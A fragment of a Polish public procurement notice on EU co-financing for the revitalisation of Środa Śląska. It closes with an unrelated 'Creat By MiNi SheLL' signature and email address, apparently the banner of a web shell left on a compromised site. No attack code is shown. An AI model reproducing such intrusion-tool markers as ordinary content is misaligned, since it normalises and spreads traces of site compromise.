<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wniosek pn. Rewitalizacja miasta Środa Śląska współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com